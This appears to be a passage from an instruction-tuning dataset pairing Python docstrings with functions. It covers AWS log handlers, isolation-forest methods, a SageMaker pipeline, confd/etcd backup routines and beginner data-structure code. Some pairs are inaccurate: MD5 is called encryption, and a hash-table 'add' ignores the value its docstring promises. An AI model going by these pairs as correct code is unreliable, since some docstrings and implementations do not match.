to set closed +and add the exception, and note an exception event.. [/INST] def on_error(self, exception): + args = [self._args['host'], self._args['port'], str(exception)] + if self._channels[0][0].open: + self._exceptions.put(exceptions.ConnectionResetException(*args)) + else: + self._exceptions.put(exceptions.ConnectionException(*args)) + self._events.set(events.EXCEPTION_RAISED) +[INST] Connect the socket to the specified host and port.. [/INST] def _connect_socket(self, sock, address): + LOGGER.debug('Connecting to %r', address) + sock.settimeout(self._args['timeout']) + sock.connect(address) +[INST] The handler for s3 CreateObject event and send the logs to Cloudwatch. [/INST] def handle_s3_logs(event, log_group, log_stream, log_format): + data = utils.parse_data(utils.unpack_data_from_s3(event), log_format) + cloud_watch = Cloudwatch(log_group, log_stream) + cloud_watch.send_logs(data) +[INST] The handler for s3 CreateObject event to extract akamai log file from email and upload. [/INST] def handle_s3_akamai_email(event, bucket, prefix=''): + data = utils.unpack_data_from_s3(event) + utils.extract_email_and_upload(data, bucket, prefix) +[INST] load object from s3 CreateObject event. [/INST] def unpack_data_from_s3(event): + bucket = event['Records'][0]['s3']['bucket']['name'] + key = event['Records'][0]['s3']['object']['key'] + print("Processing file s3://{}/{}".format(bucket, key)) + response = S3.get_object(Bucket=bucket, Key=key) + data = response['Body'].read() + if key[-3:] == '.gz': + data = gzip.decompress(data) + return data +[INST] parse data into json format logs. [/INST] def parse_data(data, log_format): + logs = [] + data = str(data, 'utf-8', errors='backslashreplace').splitlines() + result = csv.DictReader((row for row in data if not row.startswith('#')), + fieldnames=log_format, delimiter='\t') + for row in result: + date = row.pop('logdate') + time = row.pop('logtime') + log = { + 'message': json.dumps(row), + 'timestamp': int(datetime.strptime( + date + " " + time, '%Y-%m-%d %H:%M:%S').timestamp() * 1000) + } + logs.append(log) + logs.sort(key=lambda x: x['timestamp']) + return logs +[INST] Extract akamai LDS email data in gzip/mime type. [/INST] def extract_email_and_upload(data, bucket, prefix): + try: + msg = email.message_from_bytes(data) + filename = msg['subject'] + if not filename or not filename.endswith('.gzm'): + print("Invalid file, subject is: " + filename) + return 1 + regx = re.compile('.gzm\\b') + count = 0 + for part in msg.walk(): + decoded_filename = regx.sub(str(count) + '.gz', filename) + if part.get_content_maintype() == 'multipart': + continue + upload_objects_to_s3( + bucket, prefix + decoded_filename, part.get_payload(decode=True)) + count += 1 + return 0 + except Exception as err: + raise err +[INST] Loads address list and contact list in `__onload`. [/INST] def load_address_and_contact(**doc): + doc = json.loads(doc.get("doc")) + doc_type = doc.get("message").get("doctype") + doc_name = doc.get("message").get("name") + from frappe.contacts.doctype.address.address import get_address_display, get_condensed_address + filters = [ + ["Dynamic Link", "link_doctype", "=", doc_type], + ["Dynamic Link", "link_name", "=", doc_name], + ["Dynamic Link", "parenttype", "=", "Address"], + ] + address_list = frappe.get_all("Address", filters=filters, fields=["*"]) + address_list = [a.update({"display": get_address_display(a)}) + for a in address_list] + address_list = sorted(address_list, + key = functools.cmp_to_key(lambda a, b: + (int(a.is_primary_address - b.is_primary_address)) or + (1 if a.modified - b.modified else 0)), reverse=True) + contact_list = [] + filters = [ + ["Dynamic Link", "link_doctype", "=", doc_type], + ["Dynamic Link", "link_name", "=", doc_name], + ["Dynamic Link", "parenttype", "=", "Contact"], + ] + contact_list = frappe.get_all("Contact", filters=filters, fields=["*"]) + for contact in contact_list: + contact["email_ids"] = frappe.get_list("Contact Email", filters={ + "parenttype": "Contact", + "parent": contact.name, + "is_primary": 0 + }, fields=["email_id"]) + contact["phone_nos"] = frappe.get_list("Contact Phone", filters={ + "parenttype": "Contact", + "parent": contact.name, + "is_primary_phone": 0, + "is_primary_mobile_no": 0 + }, fields=["phone"]) + if contact.address: + address = frappe.get_doc("Address", contact.address) + contact["address"] = get_condensed_address(address) + contact_list = sorted(contact_list, + key = functools.cmp_to_key(lambda a, b: + (int(a.is_primary_contact - b.is_primary_contact)) or + (1 if a.modified - b.modified else 0)), reverse=True) + return {"address_list":address_list, "contact_list":contact_list} +[INST] Predict outlierness based on average isolation depth +Calculates the approximate depth that it takes to isolate an observation according to the +fitted model splits. Can output either the average depth, or a standardized outlier score +based on whether it takes more or fewer splits than average to isolate observations. In the +standardized outlier score metric, values closer to 1 indicate more outlierness, while values +closer to 0.5 indicate average outlierness, and close to 0 more averageness (harder to isolate). + +Note + +The more threads that are set for the model, the higher the memory requirements will be as each +thread will allocate an array with one entry per row. + +Note + +Predictions for sparse data will be much slower than for dense data. Not recommended to pass +sparse matrices unless they are too big to fit in memory. + +Note + +In order to save memory when fitting and serializing models, the functionality for outputting +terminal node number will generate index mappings on the fly for all tree nodes, even if passing only +1 row, so it's only recommended for batch predictions. + +Note + +The outlier scores/depth predict functionality is optimized for making predictions on one or a +few rows at a time - for making large batches of predictions, it might be faster to use the +'fit_predict' functionality. + +Parameters + +X : array or array-like (n_samples, n_features) +Observations for which to predict outlierness or average isolation depth. Can pass +a NumPy array, Pandas DataFrame, or SciPy sparse CSC or CSR matrix. + +Returns + +score : array(n_samples,) or array(n_samples, n_trees) +Requested output type for each row accoring to parameter 'output' (outlier scores, +average isolation depth, or terminal node indices).. [/INST] def predict(self, X, output = "score"): + assert self.is_fitted_ + assert output in ["score", "avg_depth", "tree_num"] + X_num, X_cat, nrows = self._process_data_new(X) + if output == "tree_num": + if self.missing_action == "divide": + raise ValueError("Cannot output tree number when using 'missing_action' = 'divide'.") + if self.new_categ_action == "weighted": + raise ValueError("Cannot output tree number when using 'new_categ_action' = 'weighted'.") + if nrows == 1: + warnings.warn("Predicting tree number is slow, not recommended to do for 1 row at a time.") + depths, tree_num = self._cpp_obj.predict(X_num, X_cat, self._is_extended_, + ctypes.c_size_t(nrows).value, + ctypes.c_int(self.nthreads).value, + ctypes.c_bool(output == "score").value, + ctypes.c_bool(output == "tree_num").value) + if output in ["score", "avg_depth"]: + return depths + else: + return tree_num +[INST] Appends isolation trees from another Isolation Forest model into this one +This function is intended for merging models **that use the same hyperparameters** but +were fitted to different subsets of data. + +In order for this to work, both models must have been fit to data in the same format +that is, same number of columns, same order of the columns, and same column types, although +not necessarily same object classes . + + + +Note + +This function will not perform any checks on the inputs, and passing two incompatible +models will result in wrong results and +potentially crashing the Python process when using it. + +Parameters + +other : IsolationForest +Another Isolation Forest model from which trees will be appended to this model. +It will not be modified during the call to this function. + +Returns + +self : obj +This object.. [/INST] def append_trees(self, other): + assert self.is_fitted_ + assert other.is_fitted_ + assert isinstance(other, IsolationForest) + if (self._is_extended_) != (other._is_extended_): + raise ValueError("Cannot mix extended and regular isolation forest models (ndim=1).") + if self.cols_categ_.shape[0]: + warnings.warn("Merging models with categorical features might give wrong results.") + self._cpp_obj.append_trees_from_other(other._cpp_obj, self._is_extended_) + self.ntrees += other.ntrees + return self +[INST] Export Isolation Forest model +Save Isolation Forest model to a serialized file along with its +metadata, in order to be re-used in Python or in the R or the C++ versions of this package. + +Although the model objects are always serializable through ``pickle``, this function +might provide a faster alternative and use less memory when the models to serialize are big. + +Note that, if the model was fitted to a ``DataFrame``, the column names must be +something exportable as JSON, and must be something that R could +use as column names . + +It is recommended to visually inspect the produced ``.metadata`` file in any case. + + + + + +The metadata will contain, among other things, the encoding that was used for +categorical columns - this is under ``data_info.cat_levels``, as an array of arrays by column, +with the first entry for each column corresponding to category 0, second to category 1, +and so on (the C++ version takes them as integers). + +The serialized file can be used in the C++ version by reading it as a binary raw file +and de-serializing its contents with the ``cereal`` library or using the provided C++ functions +for de-serialization. + +The metadata is not used in the C++ version, but is necessary for the R and Python versions. + +Note + +The model treats boolean variables as categorical. Thus, if the model was fit +to a ``DataFrame`` with boolean columns, when importing this model into C++, they need to be +encoded in the same order - e.g. + +Parameters + +file : str +The output file path into which to export the model. Must be a file name, not a +file handle. +use_cpp : bool +Whether to use C++ directly for IO. Using the C++ funcionality directly is faster, and +will write directly to a file instead of first creating the file contents in-memory, +but in Windows, if the library was compiled with a compiler other than MSVC, +file paths that contain non-ASCII characters will faill to write +and might crash the Python process along with it. If passing ``False``, it will at +first create the file contents in-memory in a Python object, and then use a Python +file handle to write such contents into a file. + +Returns + +self : obj +This object. + +References. [/INST] def export_model(self, file, use_cpp = True): + assert self.is_fitted_ + metadata = self._export_metadata() + with open(file + ".metadata", "w") as of: + json.dump(metadata, of, indent=4) + self._cpp_obj.serialize_obj(file, use_cpp, self.ndim > 1) + return self +[INST] Note + +Making predictions through SQL is much less efficient than from the model +itself, as each terminal node will have to check all of the conditions +that lead to it instead of passing observations down a tree. + +Note + +If constructed with the default arguments, the model will not perform any +sub-sampling, which can lead to very big trees. If it was fit to a large +dataset, the generated SQL might consist of gigabytes of text, and might +lay well beyond the character limit of commands accepted by SQL vendors. + +Note + + + +Note + +The generated SQL statements will only include handling of missing values +when using ``missing_action="impute"``. + +Note + +The resulting statements will include all the tree conditions as-is, +with no simplification. Thus, there might be lots of redundant conditions +in a given terminal node . + +Parameters + +enclose : str +With which symbols to enclose the column names in the select statement +so as to make them SQL compatible in case they include characters like dots. +Options are. + + + + + +``"none"``: +Will output the column names as-is +output_tree_num : bool +Whether to make the statements return the terminal node number +instead of the isolation depth. The numeration will start at zero. +tree : int or None +Tree for which to generate SQL statements. If passed, will generate +the statements only for that single tree. If passing 'None', will +generate statements for all trees in the model. +table_from : str or None +If passing this, will generate a single select statement for the +outlier score from all trees, selecting the data from the table +name passed here. In this case, will always output the outlier +score, regardless of what is passed under ``output_tree_num``. +select_as : str +Alias to give to the generated outlier score in the select statement. +Ignored when not passing ``table_from``. +column_names : None or list[str] +Column names to use for the **numeric** columns. + +Returns + +sql : list[str] or str +A list of SQL statements for each tree as strings, or the SQL statement +for a single tree if passing 'tree', or a single select-from SQL statement +with all the trees concatenated if passing ``table_from``.. [/INST] def generate_sql(self, enclose="doublequotes", output_tree_num = False, tree = None, + table_from = None, select_as = "outlier_score", + column_names = None, column_names_categ = None): + assert self.is_fitted_ + single_tree = False + if tree is not None: + if isinstance(tree, float): + tree = int(tree) + assert isinstance(tree, int) + assert tree >= 0 + assert tree < self.ntrees + single_tree = True + else: + tree = 0 + output_tree_num = bool(output_tree_num) + if self._ncols_numeric: + if column_names is not None: + if len(column_names) != self._ncols_numeric: + raise ValueError("'column_names' must have %d entries." % self._ncols_numeric) + else: + if self.cols_numeric_.shape[0]: + column_names = self.cols_numeric_ + else: + column_names = ["column_" + str(cl) for cl in range(self._ncols_numeric)] + else: + column_names = [] + if self.cols_categ_.shape[0]: + if column_names_categ is not None: + if len(column_names_categ) != self.cols_categ_.shape[0]: + raise ValueError("'column_names_categ' must have %d entries." % self.cols_categ_.shape[0]) + else: + column_names_categ = self.cols_categ_ + categ_levels = [[str(lev) for lev in mp] for mp in self._cat_mapping] + else: + column_names_categ = [] + categ_levels = [] + assert enclose in ["doublequotes", "squarebraces", "none"] + if enclose != "none": + enclose_left = '"' if (enclose == "doublequotes") else '[' + enclose_right = '"' if (enclose == "doublequotes") else ']' + column_names = [enclose_left + cl + enclose_right for cl in column_names] + column_names_categ = [enclose_left + cl + enclose_right for cl in column_names_categ] + out = [s for s in self._cpp_obj.generate_sql(self.ndim > 1, + column_names, column_names_categ, categ_levels, + output_tree_num, single_tree, tree, self.nthreads)] + if single_tree: + return out[0] + return out +[INST] None + +list[ConnectorFile] -- list of files to package +Returns none if any of the files are invalid, or the files do not agree on the name. [/INST] def generate_file_list(self) -> Optional[List[ConnectorFile]]: + logging.debug("Generating list of files for validation and/or packaging...") + if not self.path_to_folder.is_dir(): + logger.error("Error: " + str(self.path_to_folder) + " does not exist or is not a directory.") + return None + path_to_manifest = self.path_to_folder / "manifest.xml" + if not path_to_manifest.is_file(): + logger.error("Error: " + str(self.path_to_folder) + " does not contain a file called manifest.xml.") + return None + self.file_list.append(ConnectorFile("manifest.xml", "manifest")) + files_valid = self.parse_file(self.file_list[0]) + if not files_valid: + return None + if not self.class_name: + logger.debug("Class name not found in files.") + return None + if len(self.loc_strings) > 0: + logger.debug("Found translatable strings, looking for resource files...") + logger.debug('Strings found:') + for s in self.loc_strings: + logger.debug("-- " + s) + for language in TABLEAU_SUPPORTED_LANGUAGES: + resource_file_name = "resources-" + language + ".xml" + path_to_resource = self.path_to_folder / Path(resource_file_name) + if path_to_resource.is_file(): + new_file = ConnectorFile(resource_file_name, "resource") + xml_violations_buffer = [] + if not validate_single_file(new_file, path_to_resource, xml_violations_buffer): + for error in xml_violations_buffer: + logging.debug(error) + return None + self.file_list.append(ConnectorFile(resource_file_name, "resource")) + logging.debug("Adding file to list (name = " + resource_file_name + ", type = resource)") + else: + logger.debug("No loc files.") + logger.debug("Generated file list:") + for f in self.file_list: + logger.debug("-- " + f.file_name) + return self.file_list +[INST] - True if parsing succeeds +Appends any new files found in this one to self.file_list and recursively calls parse_file on it +If any translatable strings are found, append it to self.loc_strings. [/INST] def parse_file(self, file_to_parse: ConnectorFile) -> bool: + path_to_file = self.path_to_folder / str(file_to_parse.file_name) + xml_violation_buffer = [] + if not validate_single_file(file_to_parse, path_to_file, xml_violation_buffer): + for v in xml_violation_buffer: + logger.debug(v) + return False + logger.debug("Parsing " + str(path_to_file)) + xml_tree = parse(str(path_to_file)) + root = xml_tree.getroot() + for child in root.iter(): + if 'file' in child.attrib: + new_file_path = str(self.path_to_folder / child.attrib['file']) + if not os.path.isfile(new_file_path): + logger.debug("Error: " + new_file_path + " does not exist but is referenced in " + + str(file_to_parse.file_name)) + return False + logging.debug("Adding file to list (name = " + child.attrib['file'] + ", type = " + child.tag + ")") + new_file = ConnectorFile(child.attrib['file'], child.tag) + already_in_list = new_file in self.file_list + self.file_list.append(new_file) + if child.tag != 'script' and not already_in_list: + children_valid = self.parse_file(new_file) + if not children_valid: + return False + if 'url' in child.attrib: + url_link = child.attrib['url'] + if not url_link.startswith(HTTPS_STRING): + logging.error("Error: Only HTTPS URL's are allowed. URL " + url_link + + " is a non-https link in file " + file_to_parse.file_name) + return False + if 'class' in child.attrib: + if not self.class_name: + logging.debug("Found class name: " + child.attrib['class']) + self.class_name = child.attrib['class'] + elif child.attrib['class'] != self.class_name: + logging.error("Error: class attribute in file " + file_to_parse.file_name + + " does not equal class attribute in manifest.") + logging.debug(self.class_name + " in manifest, " + child.attrib['class'] + " in " + + file_to_parse.file_name) + return False + for key, value in child.attrib.items(): + if value.startswith(TRANSLATABLE_STRING_PREFIX): + self.loc_strings.append(value) + return True +[INST] Read data in, and parallelize model building with two params (in this case, dummy example with learning rate).. [/INST] def start(self): + print("flow name: %s" % current.flow_name) + print("run id: %s" % current.run_id) + print("username: %s" % current.username) + raw_data = StringIO(self.DATA_FILE).readlines() + print("Total of {} rows in the dataset!".format(len(raw_data))) + self.dataset = [[float(_) for _ in d.strip().split('\t')] for d in raw_data] + print("Raw data: {}, cleaned data: {}".format(raw_data[0].strip(), self.dataset[0])) + split_index = int(len(self.dataset) * 0.8) + self.train_dataset = self.dataset[:split_index] + self.test_dataset = self.dataset[split_index:] + print("Training data: {}, test data: {}".format(len(self.train_dataset), len(self.test_dataset))) + self.learning_rates = [0.1, 0.2] + self.next(self.train_model, foreach='learning_rates') +[INST] Train a dummy regression model with Keras +and use high-performance s3 client from metaflow to store the model tar file for further processing.. [/INST] def train_model(self): + self.learning_rate = self.input + import tensorflow as tf + from tensorflow.keras import layers + import tarfile + x_train = np.array([[_[0]] for _ in self.train_dataset]) + y_train = np.array([_[1] for _ in self.train_dataset]) + x_test = np.array([[_[0]] for _ in self.test_dataset]) + y_test = np.array([_[1] for _ in self.test_dataset]) + x_model = tf.keras.Sequential([ + layers.Dense(input_shape=[1,], units=1) + ]) + print(x_model.summary()) + x_model.compile( + optimizer=tf.optimizers.Adam(learning_rate=self.learning_rate), + loss='mean_absolute_error') + history = x_model.fit(x_train, y_train,epochs=100, validation_split=0.2) + self.hist = history.history + self.results = x_model.evaluate(x_test, y_test) + print("Test set results: {}".format(self.results)) + model_name = "regression-model-{}/1".format(self.learning_rate) + local_tar_name = 'model-{}.tar.gz'.format(self.learning_rate) + x_model.save(filepath=model_name) + with tarfile.open(local_tar_name, mode="w:gz") as _tar: + _tar.add(model_name, recursive=True) + with open(local_tar_name, "rb") as in_file: + data = in_file.read() + with S3(run=self) as s3: + url = s3.put(local_tar_name, data) + print("Model saved at: {}".format(url)) + self.s3_path = url + self.next(self.join_runs) +[INST] Join the parallel runs and merge results into a dictionary.. [/INST] def join_runs(self, inputs): + self.results_from_runs = { + inp.learning_rate: + { + 'metrics': inp.results, + 'tar': inp.s3_path + } + for inp in inputs} + print("Current results: {}".format(self.results_from_runs)) + self.best_learning_rate = choice(list(self.results_from_runs.keys())) + self.best_s3_model_path = self.results_from_runs[self.best_learning_rate]['tar'] + self.next(self.deploy) +[INST] Use SageMaker to deploy the model as a stand-alone, PaaS endpoint, with our choice of the underlying +Docker image and hardware capabilities. + + + +Once the endpoint is deployed, you can add a further step with for example behavioral testing, to +ensure model robustness . Here, we just "prove" that +the endpoint is up and running!. [/INST] def deploy(self): + from sagemaker.tensorflow import TensorFlowModel + ENDPOINT_NAME = 'regression-{}-endpoint'.format(int(round(time.time() * 1000))) + print("\n\n================\nEndpoint name is: {}\n\n".format(ENDPOINT_NAME)) + model = TensorFlowModel( + model_data=self.best_s3_model_path, + image_uri=self.DOCKER_IMAGE_URI, + role=self.IAM_SAGEMAKER_ROLE) + predictor = model.deploy( + initial_instance_count=1, + instance_type=self.SAGEMAKER_INSTANCE, + endpoint_name=ENDPOINT_NAME) + input = {'instances': np.array([[0.57457947234]])} + result = predictor.predict(input) + print(input, result) + assert result['predictions'][0][0] > 0 + self.next(self.end) +[INST] The final step is empty here, but cleaning operations and/or sending hooks for downstream deployment tasks +is a natural necessity for machine learning DAGs.. [/INST] def end(self): + print('Dag ended!') +[INST] AWS lambda function, to handle incoming GET requests asking our model for predictions.. [/INST] def predict(event, context): + print("Received event: " + json.dumps(event)) + params = event['queryStringParameters'] + response = dict() + start = time.time() + input_payload = { 'instances': [[float(params.get('x', '0.0'))]] } + result = get_response_from_sagemaker(json.dumps(input_payload), + SAGEMAKER_ENDPOINT_NAME, + content_type='application/json') + if result: + print(result) + response = result['predictions'][0][0] + return wrap_response(status_code=200, body={ + "prediction": response, + "time": time.time() - start, + "endpoint": SAGEMAKER_ENDPOINT_NAME + }) +[INST] use md5 encryption algorithm to generate a 32bit hex code.. [/INST] def md5hex(text): + if isinstance(text, unicode): + text = text.encode('utf-8') + elif not isinstance(text, str): + text = str(text) + m = hashlib.md5() + m.update(text) + return m.hexdigest() +[INST] backup old toml/tmpl/cfg files from remote confd client to server. [/INST] def backup_files(self): + for host in self._hosts: + toml_bak = os.path.join(self._l_toml_bak, host) + tmpl_bak = os.path.join(self._l_tmpl_bak, host) + conf_bak = os.path.join(self._l_conf_bak, host) + remove_folder(toml_bak) + remove_folder(tmpl_bak) + remove_folder(conf_bak) + get_folder(toml_bak) + get_folder(tmpl_bak) + get_folder(conf_bak) + toml_pre = '%s/' % os.path.join('toml', self._folder_pre, host) + tmpl_pre = '%s/' % os.path.join('tmpl', self._folder_pre, host) + conf_pre = '%s/' % os.path.join('conf', self._folder_pre, host) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=toml_pre, recursive=False) + for x in objs: + self.minio.remove_object( + bucket_name=self._minio_bucket, + object_name=x.object_name.encode('utf-8')) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=tmpl_pre, recursive=False) + for x in objs: + self.minio.remove_object( + bucket_name=self._minio_bucket, + object_name=x.object_name.encode('utf-8')) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=conf_pre, recursive=False) + for x in objs: + self.minio.remove_object( + bucket_name=self._minio_bucket, + object_name=x.object_name.encode('utf-8')) + aapi = Ansible2API(hosts=[host], **self._ansible_kwargs) + tomls = self.get_tomls(host=host) + for x in tomls: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='fetch', + args=dict( + dest='%s/' % toml_bak, + src=os.path.join(self._r_toml, x), + flat='yes')) + msg = 'Toml File Backup: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Toml File Backup: %s' % results + app.logger.info(logmsg(msg)) + self.minio.fput_object( + bucket_name=self._minio_bucket, + object_name=os.path.join(toml_pre, x), + file_path=os.path.join(toml_bak, x)) + tmpls = self.get_tmpls(host=host) + for x in tmpls: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='fetch', + args=dict( + dest='%s/' % tmpl_bak, + src=os.path.join(self._r_tmpl, self._folder_pre, x), + flat='yes')) + msg = 'Tmpl File Backup: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Tmpl File Backup: %s' % results + app.logger.info(logmsg(msg)) + self.minio.fput_object( + bucket_name=self._minio_bucket, + object_name=os.path.join(tmpl_pre, x), + file_path=os.path.join(tmpl_bak, x)) + for x in self._files: + src = os.path.join(x['dir'], x['name']) + file_name = '%s%s%s' % ( + '@@'.join([x['mode'], x['owner']['name'], x['owner']['group']]), + self._broken_word_2, + src.replace('/', self._broken_word_1)) + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='fetch', + args=dict( + dest=os.path.join(conf_bak, file_name), + src=src, flat='yes')) + msg = 'Conf File Backup: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Conf File Backup: %s' % results + app.logger.info(logmsg(msg)) + file_path = os.path.join(conf_bak, file_name) + if os.path.isfile(file_path): + self.minio.fput_object( + bucket_name=self._minio_bucket, + object_name=os.path.join(conf_pre, file_name), + file_path=file_path) + objs = [os.path.basename(x.object_name.encode('utf-8')) for x in + self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=toml_pre, + recursive=False)] + for x in tomls: + if x not in objs: + raise Exception('Toml Backup Failed: %s.' % x) + objs = [os.path.basename(x.object_name.encode('utf-8')) for x in + self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=tmpl_pre, + recursive=False)] + for x in tmpls: + if x not in objs: + raise Exception('Tmpl Backup Failed: %s.' % x) +[INST] backup configuration keys using etcd server. [/INST] def backup_keys(self): + dir_pre = os.path.join('/', self._key_bak_pre, self._folder_pre) + if dir_pre in self.etcd: + self.etcd.delete(key=dir_pre, dir=True, recursive=True) + for x in self._files: + items = self.get_keys(cfg_name=x['name']) + for k, v in items.items(): + ret = self.etcd.write( + key=os.path.join(dir_pre, x['name'], k), value=v) + msg = 'Etcd Key Backup: %s.' % ret + app.logger.info(logmsg(msg)) +[INST] update configuration keys stored in etcd server +ps: when called for rollback, would delete keys totally new. [/INST] def update_keys(self, rollback=False): + for x in self._files: + items = (self.get_keys(cfg_name=x['name'], rollback=rollback) + if rollback else x['items']) + diff = set(x['items'].keys()).difference(set(items.keys())) + for k in diff: + key = os.path.join('/', self._folder_pre, x['name'], k) + if key in self.etcd: + ret = self.etcd.delete(key=key) + msg = 'Etcd Key Deleted: %s.' % ret + app.logger.info(logmsg(msg)) + for k, v in items.items(): + ret = self.etcd.write( + key=os.path.join('/', self._folder_pre, x['name'], k), + value=v) + msg = 'Etcd Key Updated: %s.' % ret + app.logger.info(logmsg(msg)) +[INST] delete expired configuration keys stored in etcd server. [/INST] def delete_expired_keys(self): + for x in self._files: + key_pre = os.path.join('/', self._folder_pre, x['name']) + if key_pre in self.etcd: + father = self.etcd.read(key=key_pre) + if hasattr(father, '_children'): + for y in father._children: + if y['key'].split('/')[-1] not in x['items'].keys(): + ret = self.etcd.delete(key=y['key']) + msg = 'Etcd Key Deleted: %s.' % ret + app.logger.info(logmsg(msg)) +[INST] delete expired toml/tmpl files in remote confd client. [/INST] def delete_expired_files(self): + cfg_names = [x['name'] for x in self._files] + for host in self._hosts: + aapi = Ansible2API(hosts=[host], **self._ansible_kwargs) + tomls = self.get_tomls(host=host) + for x in tomls: + config = x.split(self._file_pre)[1].split('toml')[0].strip('.') + if config not in cfg_names: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='file', + args=dict( + path=os.path.join(self._r_toml, x), + state='absent')) + msg = 'Toml File Deleted: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Toml File Deleted: %s' % results + app.logger.info(logmsg(msg)) + tmpls = self.get_tmpls(host=host) + for x in tmpls: + config = x.split('.tmpl')[0] + if config not in cfg_names: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='file', + args=dict( + path=os.path.join( + self._r_tmpl, self._folder_pre, x), + state='absent')) + msg = 'Tmpl File Deleted: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Tmpl File Deleted: %s' % results + app.logger.info(logmsg(msg)) +[INST] delete old toml/tmpl files in remote confd client +ps: make sure that all these files have been backup already. [/INST] def delete_files(self): + for host in self._hosts: + aapi = Ansible2API(hosts=[host], **self._ansible_kwargs) + tomls = self.get_tomls(host=host) + for x in tomls: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='file', + args=dict( + path=os.path.join(self._r_toml, x), + state='absent')) + msg = 'Toml File Deleted: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Toml File Deleted: %s' % results + app.logger.info(logmsg(msg)) + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='file', + args=dict( + path='%s/' % os.path.join( + self._r_tmpl, self._folder_pre), + state='absent')) + msg = 'Tmpl File Deleted: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Tmpl File Deleted: %s' % results + app.logger.info(logmsg(msg)) + for x in self._files: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='file', + args=dict( + path=os.path.join(x['dir'], x['name']), + state='absent')) + msg = 'Conf File Deleted: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Conf File Deleted: %s' % results + app.logger.info(logmsg(msg)) +[INST] update toml/tmpl/(conf) files to remote/local confd client. [/INST] def push_files(self, rollback=False): + for host in self._hosts: + aapi = Ansible2API(hosts=[host], **self._ansible_kwargs) + toml_folder = '%s/' % ( + os.path.join(self._l_toml_bak, host) + if rollback else os.path.join(self._l_toml, host)) + tmpl_folder = '{}/'.format( + os.path.join(self._l_tmpl_bak, host) + if rollback else self._l_tmpl) + if rollback: + conf_folder = '%s/' % os.path.join(self._l_conf_bak, host) + remove_folder(toml_folder) + remove_folder(tmpl_folder) + remove_folder(conf_folder) + get_folder(toml_folder) + get_folder(tmpl_folder) + get_folder(conf_folder) + toml_pre = '%s/' % os.path.join('toml', self._folder_pre, host) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=toml_pre, recursive=False) + for x in objs: + object_name = x.object_name.encode('utf-8') + self.minio.fget_object( + bucket_name=self._minio_bucket, + object_name=object_name, + file_path=os.path.join( + toml_folder, os.path.basename(object_name))) + tmpl_pre = '%s/' % os.path.join('tmpl', self._folder_pre, host) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=tmpl_pre, recursive=False) + for x in objs: + object_name = x.object_name.encode('utf-8') + self.minio.fget_object( + bucket_name=self._minio_bucket, + object_name=object_name, + file_path=os.path.join( + tmpl_folder, os.path.basename(object_name))) + conf_pre = '%s/' % os.path.join('conf', self._folder_pre, host) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=conf_pre, recursive=False) + for x in objs: + object_name = x.object_name.encode('utf-8') + self.minio.fget_object( + bucket_name=self._minio_bucket, + object_name=object_name, + file_path=os.path.join( + conf_folder, os.path.basename(object_name))) + for x in os.listdir(conf_folder): + config = x.split(self._broken_word_2) + file_path = config[1].replace(self._broken_word_1, '/') + info = config[0].split('@@') + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='copy', + args=dict( + mode=info[0], + src=os.path.join(conf_folder, x), + dest=file_path, + group=info[2], + owner=info[1])) + msg = 'Conf File Updated: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Conf File Updated: %s' % results + app.logger.info(logmsg(msg)) + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='copy', + args=dict( + mode=self._confd_file_mode, + src=toml_folder, + dest=self._r_toml, + group=self._confd_owner[1], + owner=self._confd_owner[0])) + msg = 'Toml File Updated: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Toml File Updated: %s' % results + app.logger.info(logmsg(msg)) + r_tmpl_folder = os.path.join(self._r_tmpl, self._folder_pre) + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='copy', + args=dict( + mode=self._confd_file_mode, + src=tmpl_folder, + dest=r_tmpl_folder, + group=self._confd_owner[1], + owner=self._confd_owner[0])) + msg = 'Tmpl File Updated: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Tmpl File Updated: %s' % results + app.logger.info(logmsg(msg)) +[INST] Returns True if Empty and false otherwise. [/INST] def is_empty(self): + if self.top: + return False + return True +[INST] Returns the value at the top without modifying the stack, raises an exception otherwise. [/INST] def peek(self): + if not self.is_empty(): + return self.top.value + raise EmptyStackException("Cannot peek an empty stack") +[INST] Returns the value at the top without modifying the queue, raises an exception otherwise. [/INST] def peek(self): + if not self.stack.is_empty(): + current = self.stack.top + items = [] + while current: + items.insert(0,str(current.value)) + current = current.next + return items[0] + raise EmptyStackException("Cannot peek an empty stack") +[INST] this function takes a string value and return hashed key. [/INST] def hash(self,key): + sum = 0 + for letter in key: + sum= (sum + ord(letter)* key.index(letter) * 19)% self.size + return sum +[INST] this function take a string key and a value then add them in the hashtable as a list. [/INST] def add(self,key): + index = self.hash(key) + if self.buckets[index] is None: + self.buckets[index] = key + return None + return key +[INST] this method to append value in the last node +input ==> value. [/INST] def append(self, value): + if value is None: + raise TypeError("insert() missing 1 required positional argument: 'value' ") + else: + new_node = Node(value) + if not self.head: + self.head = new_node + else: + new_node = Node(value) + current = self.head + while current.next: + current = current.next + current.next = new_node +[INST] delete an item to the rear fo the queue. [/INST] def dequeue(self): + if not self.is_empty(): + temp = self.front + self.front = self.front.next + temp.next = None + return temp.value + raise EmptyQueueException("Cannot dequeue an empty queue") +[INST] 